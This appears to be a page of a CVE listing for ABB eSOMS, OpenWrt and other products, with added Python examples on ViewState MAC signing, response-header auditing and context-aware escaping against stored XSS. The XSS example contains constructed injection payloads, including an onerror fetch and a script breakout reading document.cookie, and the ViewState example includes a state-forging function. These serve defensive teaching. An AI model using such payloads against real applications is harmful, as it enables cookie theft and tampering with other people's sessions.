CVSS v2 3.6 | Gained access: None | Access vector: Local | Complexity: Low | Authentication: Not required | Confidentiality: Partial | Integrity: Partial | Availability: None
The Redis data structure component used in ABB eSOMS versions 6.0 to 6.0.2 stores credentials in clear text. If an attacker has file system access, this can potentially compromise the credentials' confidentiality.
1991. CVE-2019-19095 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-04-02 | Updated: 2020-04-03
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
ABB eSOMS versions 4.0 to 6.0.2 lack adequate input/output validation, which might allow attacks such as stored cross-site scripting by storing malicious content in the database.
1992. CVE-2019-19092 | CWE-306 | Exploits: none listed | Type: (none listed) | Published: 2020-04-02 | Updated: 2020-04-03
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: None | Availability: None
ABB eSOMS versions 4.0 to 6.0.3 use ASP.NET Viewstate without Message Authentication Code (MAC). Alterations to Viewstate might thus not be noticed.
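The eSOMS ViewState row above is the general problem of state that the server hands to the client and accepts back: without a MAC, the server has no way to tell its own serialized state from one the client edited. The following added example is a minimal signed-state scheme in Python, not ASP.NET's ViewState format or ABB's code; it shows an unsigned blob being altered silently and the same alteration being caught once an HMAC is attached. The key and the order record are constructed.

```python
# Added example for the ABB eSOMS ViewState row above (CVE-2019-19092). A
# minimal signed-state scheme in Python, not ASP.NET's ViewState format: it
# shows why state that round-trips through the client needs a MAC and what
# "alterations not noticed" looks like without one. Key and state are constructed.
import base64
import hashlib
import hmac
import json
from typing import Any, Dict

TAG_LEN = hashlib.sha256().digest_size
# Constructed key; a real deployment loads it from a key store or, for
# ASP.NET, the <machineKey> configuration shared across the web farm.
SERVER_KEY = b"constructed-demo-key-do-not-reuse-0123456789"


class TamperedState(ValueError):
    """Raised when the MAC on client-supplied state does not verify."""


def _serialise(state: Dict[str, Any]) -> bytes:
    return json.dumps(state, sort_keys=True, separators=(",", ":")).encode()


# --- Without a MAC: whatever comes back is trusted as-is ------------------
def encode_unsigned(state: Dict[str, Any]) -> str:
    return base64.urlsafe_b64encode(_serialise(state)).decode()


def decode_unsigned(blob: str) -> Dict[str, Any]:
    return json.loads(base64.urlsafe_b64decode(blob))


# --- With a MAC: payload || HMAC-SHA256(key, payload) ----------------------
def encode_signed(state: Dict[str, Any], key: bytes = SERVER_KEY) -> str:
    payload = _serialise(state)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + tag).decode()


def decode_signed(blob: str, key: bytes = SERVER_KEY) -> Dict[str, Any]:
    raw = base64.urlsafe_b64decode(blob)
    if len(raw) < TAG_LEN:
        raise TamperedState("state too short to carry a MAC")
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # constant-time comparison
        raise TamperedState("MAC mismatch")
    return json.loads(payload)


# --- What the attacker does: edit one field, keep everything else ----------
def forge_unsigned(blob: str, field: str, value: Any) -> str:
    state = decode_unsigned(blob)
    state[field] = value
    return encode_unsigned(state)


def forge_signed(blob: str, field: str, value: Any) -> str:
    """Edits the payload but cannot recompute the tag without the key,
    so the old tag is reattached and verification fails."""
    raw = base64.urlsafe_b64decode(blob)
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    state = json.loads(payload)
    state[field] = value
    return base64.urlsafe_b64encode(_serialise(state) + tag).decode()


ORDER = {"order_id": 4711, "unit_price": 199.0, "quantity": 1, "approved": False}

if __name__ == "__main__":
    print(decode_unsigned(forge_unsigned(encode_unsigned(ORDER), "approved", True)))
    try:
        decode_signed(forge_signed(encode_signed(ORDER), "approved", True))
    except TamperedState as err:
        print("rejected:", err)
```

In ASP.NET the equivalent is never setting `enableViewStateMac="false"` (.NET Framework 4.5.2 and later no longer honour that setting) and configuring an explicit `<machineKey>` so every node in a farm verifies the same tag. A MAC gives integrity only: ViewState that carries anything confidential also needs the separate ViewState encryption setting, and a leaked machineKey lets an attacker sign arbitrary state again, which is a different and more severe class of bug than the one in this row.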
1993. CVE-2019-19090 | CWE-311 | Exploits: none listed | Type: (none listed) | Published: 2020-04-02 | Updated: 2020-04-03
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: None | Availability: None
For ABB eSOMS versions 4.0 to 6.0.2, the Secure flag is not set on the cookie in the HTTP response header, so the browser may also send the cookie over unencrypted connections, making it susceptible to eavesdropping.
1994. CVE-2019-19085 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-11-18 | Updated: 2019-11-20
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
A persistent cross-site scripting (XSS) vulnerability in Octopus Server 3.4.0 through 2019.10.5 allows remote authenticated attackers to inject arbitrary web script or HTML.
1995. CVE-2019-19002 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2020-04-02 | Updated: 2020-04-03
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
For ABB eSOMS versions 4.0 to 6.0.2, the X-XSS-Protection HTTP response header is not set in responses from the web server. For older web browsers that do not support Content Security Policy, this might increase the risk of cross-site scripting.
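Two of the eSOMS rows above (the cookie without a Secure flag, and the missing X-XSS-Protection header) are findings a response-header audit produces in seconds, and both are fixed in web server or framework configuration rather than application code. The following added example, not ABB's code, runs such an audit over two constructed responses: one in the shape the rows describe and one hardened. The cookie names, the header set checked and the wording of the findings are assumptions.

```python
# Added example for the two ABB eSOMS rows above about the cookie Secure flag
# (CVE-2019-19090) and the missing X-XSS-Protection header (CVE-2019-19002):
# a small response-header audit run over constructed responses. Not ABB's
# code; cookie names and the header set are assumptions.
from typing import Dict, List, Tuple


def parse_response_headers(raw: str) -> List[Tuple[str, str]]:
    """Takes a raw response head (status line plus headers); returns (name, value) pairs."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:               # skip the status line
        if not line.strip():
            break                        # end of the header block
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def audit(raw: str) -> List[str]:
    """Returns human-readable findings; an empty list means nothing flagged."""
    by_name: Dict[str, List[str]] = {}
    for name, value in parse_response_headers(raw):
        by_name.setdefault(name.lower(), []).append(value)
    findings = []

    for cookie in by_name.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0].strip()
        attrs = {part.strip().split("=", 1)[0].lower() for part in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name}: missing Secure (also sent over plain HTTP)")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name}: missing HttpOnly (readable by script)")
        if "samesite" not in attrs:
            findings.append(f"cookie {cookie_name}: missing SameSite")

    if "content-security-policy" not in by_name:
        findings.append("missing Content-Security-Policy")
        if "x-xss-protection" not in by_name:
            findings.append("missing X-XSS-Protection (only matters to legacy browsers without CSP)")
    if [v.lower() for v in by_name.get("x-content-type-options", [])] != ["nosniff"]:
        findings.append("missing X-Content-Type-Options: nosniff")
    if "strict-transport-security" not in by_name:
        findings.append("missing Strict-Transport-Security")
    return findings


# Constructed responses: the shape the rows describe, and a hardened one.
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=abc123; path=/
Set-Cookie: .ASPXAUTH=def456; path=/; HttpOnly
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=abc123; path=/; Secure; HttpOnly; SameSite=Lax
Set-Cookie: .ASPXAUTH=def456; path=/; Secure; HttpOnly; SameSite=Lax
Content-Security-Policy: default-src 'self'; object-src 'none'; frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
"""

if __name__ == "__main__":
    for finding in audit(WEAK_RESPONSE):
        print("-", finding)
    print("hardened:", audit(HARDENED_RESPONSE) or "no findings")
```

The audit treats X-XSS-Protection the way the row does, as a fallback only for browsers without CSP: the filter it controlled has been removed from Chromium-based browsers, so current guidance is to rely on a Content-Security-Policy and set `X-XSS-Protection: 0` or omit it. Secure, HttpOnly and SameSite on the session cookies, and HSTS on the site, are the controls that change what an attacker can do.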
1996. CVE-2019-18994 | CWE-20 | Exploits: none listed | Type: DoS | Published: 2019-12-18 | Updated: 2019-12-31
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: None | Availability: Partial
Due to a lack of file length check, the HMIStudio component of ABB PB610 Panel Builder 600 versions 2.8.0.424 and earlier crashes when trying to load an empty *.JPR application file. An attacker with access to the file system might be able to cause application malfunction such as denial of service.
1997. CVE-2019-18993 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-03 | Updated: 2019-12-16
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
OpenWrt 18.06.4 allows XSS via the "New port forward" Name field to the cgi-bin/luci/admin/network/firewall/forwards URI (this can occur, for example, on a TP-Link Archer C7 device).
1998. CVE-2019-18992 | CWE-79 | Exploits: none listed | Type: XSS | Published: 2019-12-03 | Updated: 2019-12-16
CVSS v2 3.5 | Gained access: None | Access vector: Remote | Complexity: Medium | Authentication: Single system | Confidentiality: None | Integrity: Partial | Availability: None
OpenWrt 18.06.4 allows XSS via these Name fields to the cgi-bin/luci/admin/network/firewall/rules URI: "Open ports on router" and "New forward rule" and "New Source NAT" (this can occur, for example, on a TP-Link Archer C7 device).
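Most rows on this page are stored XSS through a free-text field (a FreePBX Display Name, a ListingPro listing field, an OpenWrt firewall rule name, a Matrix42 comment) that an administrator's browser later renders. The bug is the same each time: the stored value is concatenated into HTML at output time without escaping for the context it lands in. The following added example, in Python and not code from any of those projects, shows the unsafe rendering beside the escaping for the three contexts a name field typically ends up in (HTML text, a quoted attribute, an inline-script literal). The template strings and the payloads are constructed.

```python
# Added example for the stored-XSS rows above (FreePBX Display Name, ListingPro
# fields, OpenWrt LuCI rule names and similar): the unsafe rendering pattern and
# the context-specific escaping that fixes it. Illustrative Python, not code
# from any of those projects; template strings and payloads are constructed.
import html
import json

# Constructed attacker input for a "Display Name" / rule "Name" field.
PAYLOAD = "<img src=x onerror=\"fetch('/admin/config.php',{credentials:'include'})\">"
# Constructed inputs that target the attribute and inline-script contexts.
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'
SCRIPT_PAYLOAD = "</script><script>alert(document.cookie)</script>"

WRAPPER_TAGS = ("<tr>", "<td>", "</td>", "</tr>")


def render_row_vulnerable(display_name: str) -> str:
    """The bug: stored text concatenated straight into HTML."""
    return f"<tr><td>{display_name}</td></tr>"


def render_row_escaped(display_name: str) -> str:
    """HTML text context: escape &, <, > and both quotes at output time."""
    return f"<tr><td>{html.escape(display_name, quote=True)}</td></tr>"


def render_attr_escaped(display_name: str) -> str:
    """Attribute context: the attribute must be quoted AND the value escaped;
    an unquoted attribute can be broken out of with a single space."""
    return f'<input type="text" name="display_name" value="{html.escape(display_name, quote=True)}">'


def render_js_literal_escaped(display_name: str) -> str:
    """Inline-script context: JSON-encode, then neutralise '<' so that a
    '</script>' inside the string cannot terminate the script block."""
    literal = json.dumps(display_name).replace("<", "\\u003c")
    return f"<script>var displayName = {literal};</script>"


def has_injected_markup(rendered: str) -> bool:
    """True if anything other than the template's own tags starts a tag."""
    stripped = rendered
    for tag in WRAPPER_TAGS:
        stripped = stripped.replace(tag, "")
    return "<" in stripped


if __name__ == "__main__":
    print(render_row_vulnerable(PAYLOAD))
    print(render_row_escaped(PAYLOAD))
    print(render_attr_escaped(ATTR_PAYLOAD))
    print(render_js_literal_escaped(SCRIPT_PAYLOAD))
```

Escaping is the right fix for fields that are meant to be plain text, which is all of the fields named in the rows above. It is not the fix for a rich-text field such as the nopCommerce editor in row 1955, where the stored value is supposed to contain HTML; that case needs an element-and-attribute allowlist sanitizer at save or render time, and the vendor's "feature" position only holds if the editor is reachable by fully trusted administrators alone. A Content-Security-Policy without `'unsafe-inline'` limits what a stored payload can still do when one of these escapes is missed.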
1999. CVE-2019-18946 | CWE-384 | Exploits: none listed | Type: (none listed) | Published: 2021-02-26 | Updated: 2021-03-01
CVSS v2 3.8 | Gained access: None | Access vector: Local Network | Complexity: Medium | Authentication: Single system | Confidentiality: Partial | Integrity: Partial | Availability: None
Micro Focus Solutions Business Manager Application Repository versions prior to 11.7.1 are vulnerable to session fixation.
2000. CVE-2019-18845 | CWE-269 | Exploits: none listed | Type: +Priv | Published: 2019-11-09 | Updated: 2020-03-18
CVSS v2 3.6 | Gained access: None | Access vector: Local | Complexity: Low | Authentication: Not required | Confidentiality: Partial | Integrity: Partial | Availability: None
The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.